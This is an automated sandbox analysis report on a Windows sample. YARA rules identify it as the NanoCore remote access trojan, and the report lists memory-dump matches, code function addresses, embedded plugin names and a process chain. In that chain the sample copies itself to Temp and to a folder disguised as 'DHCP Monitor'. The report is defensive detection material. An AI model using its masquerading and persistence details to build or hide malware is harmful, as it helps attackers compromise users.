Source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.3559b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.399257150.0000000003BBA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000015.00000002.388544589.000000000279F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.405182304.0000000003BB9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.404921378.0000000002BB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000015.00000002.390215746.00000000038A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000018.00000002.392927550.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000014.00000002.379660901.000000000414A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000019.00000002.403212048.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.399603161.0000000003C59000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.527752364.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.419717082.0000000002321000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.309846950.00000000034BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001A.00000002.415670197.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.309323538.000000000244F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.538189526.00000000055D0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.538189526.00000000055D0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000014.00000002.378626193.000000000310B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000018.00000002.395603538.0000000003171000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.397927395.0000000002B4F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.538301786.0000000005650000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000015.00000002.389928508.000000000380A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.419911932.0000000003329000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2752, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: LFEs2N6DU4.exe PID: 3784, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: LFEs2N6DU4.exe PID: 2860, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6188, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6304, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: LFEs2N6DU4.exe PID: 6504, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6648, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6732, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_022719E2	1_2_022719E2
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02273B0C	1_2_02273B0C
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02272B5B	1_2_02272B5B
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02274B88	1_2_02274B88
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02272178	1_2_02272178
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02272188	1_2_02272188
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02274621	1_2_02274621
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_0227267E	1_2_0227267E
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_0227267E	1_2_0227267E
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_022726BA	1_2_022726BA
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_022726E9	1_2_022726E9
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_022726D6	1_2_022726D6
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02272722	1_2_02272722
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_0227273A	1_2_0227273A
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02272703	1_2_02272703
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02272767	1_2_02272767
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_0227277F	1_2_0227277F
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Code function: 1_2_02273D8B	1_2_02273D8B
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Code function: 13_2_02D8E480	13_2_02D8E480
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Code function: 13_2_02D8E471	13_2_02D8E471
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Code function: 13_2_02D8BBD4	13_2_02D8BBD4
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Code function: 13_2_069E0040	13_2_069E0040
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A19E2	21_2_026A19E2
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2188	21_2_026A2188
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2180	21_2_026A2180
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_029419E2	22_2_029419E2
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_02944B88	22_2_02944B88
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_02942188	22_2_02942188
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_02942178	22_2_02942178
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_029447AD	22_2_029447AD
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Code function: 24_2_055FE471	24_2_055FE471
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Code function: 24_2_055FE480	24_2_055FE480
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Code function: 24_2_055FBBD4	24_2_055FBBD4
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Code function: 25_2_0122E471	25_2_0122E471
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Code function: 25_2_0122E480	25_2_0122E480
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Code function: 25_2_0122BBD4	25_2_0122BBD4
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Code function: 26_2_0228E471	26_2_0228E471
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Code function: 26_2_0228E480	26_2_0228E480
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Code function: 26_2_0228BBD4	26_2_0228BBD4

Source: LFEs2N6DU4.exe	Binary or memory string: OriginalFilename vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000001.00000000.258844552.0000000000062000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp5NW.exe0 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000001.00000002.310115829.0000000003559000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSzxppkyqovxyiyryjhv.dll" vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe	Binary or memory string: OriginalFilename vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 0000000D.00000002.537037036.0000000003DA9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 0000000D.00000000.307140008.0000000000962000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp5NW.exe0 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe	Binary or memory string: OriginalFilename vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000014.00000000.319098885.0000000000D72000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp5NW.exe0 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000014.00000002.379884809.00000000041E9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSzxppkyqovxyiyryjhv.dll" vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe	Binary or memory string: OriginalFilename vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000018.00000002.395949741.0000000004179000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000018.00000000.369812368.0000000000D02000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameConsoleApp5NW.exe0 vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe, 00000018.00000002.394318901.000000000143A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs LFEs2N6DU4.exe
Source: LFEs2N6DU4.exe	Binary or memory string: OriginalFilenameConsoleApp5NW.exe0 vs LFEs2N6DU4.exe

Source: LFEs2N6DU4.exe

Virustotal: Detection: 12%

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

File read: C:\Users\user\Desktop\LFEs2N6DU4.exe

Jump to behavior

Source: LFEs2N6DU4.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LFEs2N6DU4.exe 'C:\Users\user\Desktop\LFEs2N6DU4.exe'
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
